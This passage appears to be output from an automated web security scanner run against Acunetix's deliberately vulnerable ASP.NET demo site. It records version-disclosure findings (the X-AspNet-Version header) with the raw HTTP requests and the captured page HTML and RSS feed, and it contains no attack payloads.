</li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/rssFeed.aspx
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 220 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2118
Response Body - size: 2,118 bytes.	<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an 